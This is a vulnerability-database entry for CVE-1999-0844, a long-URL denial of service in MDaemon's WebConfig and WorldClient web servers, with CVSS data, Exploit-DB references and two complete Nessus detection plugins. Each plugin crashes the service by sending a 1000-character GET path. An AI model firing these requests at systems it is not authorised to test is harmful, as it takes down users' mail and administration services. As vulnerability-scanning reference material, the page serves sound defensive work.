Vulnerabilities > CVE-1999-0844 - WebConfig Overflow DoS vulnerability in Deerfield Mdaemon 2.8.5/2.8.6

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
deerfield
nessus
exploit available

Summary

Denial of service in MDaemon WorldClient and WebConfig services via a long URL.

Vulnerable Configurations

Part Description Count
Application
Deerfield
2

Exploit-Db

  • descriptionAlt-N MDaemon 2.8.5 0 WebConfig Overflow DoS Vulnerability. CVE-1999-0844. Dos exploit for windows platform
    idEDB-ID:19639
    last seen2016-02-02
    modified1999-11-24
    published1999-11-24
    reporterUssr Labs
    sourcehttps://www.exploit-db.com/download/19639/
    titleAlt-N MDaemon 2.8.5 - WebConfig Overflow DoS Vulnerability
  • descriptionAlt-N WorldClient Pro 2.0 .0.0/2.0.1 .0/Standard 2.0 .0.0 Long URL DoS Vulnerability. CVE-1999-0844. Dos exploit for windows platform
    idEDB-ID:19640
    last seen2016-02-02
    modified1999-11-26
    published1999-11-26
    reporterUssr Labs
    sourcehttps://www.exploit-db.com/download/19640/
    titleAlt-N WorldClient Pro 2.0.0.0/2.0.1.0/Standard 2.0.0.0 - Long URL DoS Vulnerability

Nessus

  • NASL familyWeb Servers
    NASL idMDAEMON_WEBCONFIG.NASL
    descriptionIt was possible to crash Webconfig (which is used to configure MDaemon) by sending the request : GET /aaaaa[...]aaa HTTP/1.0 This could allow a remote attacker to crash the web server, preventing the MDaemon server from being configured remotely.
    last seen2020-06-01
    modified2020-06-02
    plugin id10138
    published1999-11-24
    reporterThis script is Copyright (C) 1999-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/10138
    titleMDaemon WebConfig HTTP Server URL Overflow DoS
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if(description)
    {
     script_id(10138);
     script_version ("1.29");
     script_cve_id("CVE-1999-0844");
     script_bugtraq_id(820);
    
     script_name(english:"MDaemon WebConfig HTTP Server URL Overflow DoS");
     script_summary(english:"Crashes the remote service");
     
     script_set_attribute(
       attribute:"synopsis",
       value:"The remote web server has a denial of service vulnerability."
     );
     script_set_attribute( attribute:"description",  value:
    "It was possible to crash Webconfig (which is used to configure
    MDaemon) by sending the request :
    
      GET /aaaaa[...]aaa HTTP/1.0
    
    This could allow a remote attacker to crash the web server, preventing
    the MDaemon server from being configured remotely." );
     script_set_attribute(
       attribute:"see_also",
       value:"https://seclists.org/bugtraq/1999/Nov/340"
     );
     script_set_attribute(
       attribute:"solution", 
       value:"Upgrade to the latest version of this software."
     );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
     script_set_attribute(attribute:"plugin_publication_date", value: "1999/11/24");
     script_set_attribute(attribute:"vuln_publication_date", value: "1999/11/24");
     script_cvs_date("Date: 2018/11/15 20:50:25");
     script_set_attribute(attribute:"plugin_type", value:"remote");
     script_end_attributes();
    
     script_category(ACT_DENIAL);
     script_family(english:"Web Servers");
    
     script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.");
    
     script_dependencie("http_version.nasl");
     script_require_ports(2002);
     exit(0);
    }
    
    #
    # The script code starts here
    #
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    
    port = 2002;
    if(! get_port_state(port)) exit(0, "Port "+port+" is closed");
    
    if(http_is_dead(port:port))exit(0, "The web server on port "+port+" is dead");
     
    w = http_send_recv3(method:"GET", item: crap(1000), port:port);
    if (http_is_dead(port:port)) security_warning(port);
    
    
  • NASL familyWeb Servers
    NASL idMDAEMON_WORLDCLIENT.NASL
    descriptionIt was possible to crash the remote WorldClient web server (which allows users to read their mail remotely) by sending : GET /aaaaa[...]aaa HTTP/1.0 This issue allows a remote attacker to prevent users from reading their email.
    last seen2020-06-01
    modified2020-06-02
    plugin id10139
    published1999-11-24
    reporterThis script is Copyright (C) 1999-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/10139
    titleMDaemon WorldClient HTTP Server URL Overflow DoS
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    
    if(description)
    {
     script_id(10139);
     script_version ("1.29");
    
     script_cve_id("CVE-1999-0844");
     script_bugtraq_id(823);
    
     script_name(english:"MDaemon WorldClient HTTP Server URL Overflow DoS");
     script_summary(english:"Crashes the remote service");
     
     script_set_attribute(
       attribute:"synopsis",
       value:"The remote web server has a denial of service vulnerability."
     );
     script_set_attribute( attribute:"description",  value:
    "It was possible to crash the remote WorldClient web server (which
    allows users to read their mail remotely) by sending :
    
      GET /aaaaa[...]aaa HTTP/1.0
    
    This issue allows a remote attacker to prevent users from reading
    their email." );
     script_set_attribute(
       attribute:"see_also",
       value:"https://seclists.org/bugtraq/1999/Nov/340"
     );
     script_set_attribute(
       attribute:"solution", 
       value:"Upgrade to the latest version of this software."
     );
     script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
     script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
     script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
     script_set_attribute(attribute:"exploit_available", value:"true");
     script_set_attribute(attribute:"plugin_publication_date", value: "1999/11/24");
     script_set_attribute(attribute:"vuln_publication_date", value: "1999/11/24");
     script_cvs_date("Date: 2018/11/15 20:50:25");
     script_set_attribute(attribute:"plugin_type", value:"remote");
     script_end_attributes();
    
     script_category(ACT_DENIAL);
     script_family(english:"Web Servers");
    
     script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.");
    
     script_dependencie("http_version.nasl");
     script_require_ports(2000);
     exit(0);
    }
    
    #
    # The script code starts here
    #
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    
    port = 2000;
    if (! get_port_state(port)) exit(0, "Port "+port+" is closed");
    
    if (http_is_dead(port:port)) exit(0, "The web server on port "+port+" is dead");
     
    w  = http_send_recv3(method:"GET", port:port, item: crap(1000));
    if (http_is_dead(port:port))security_warning(port);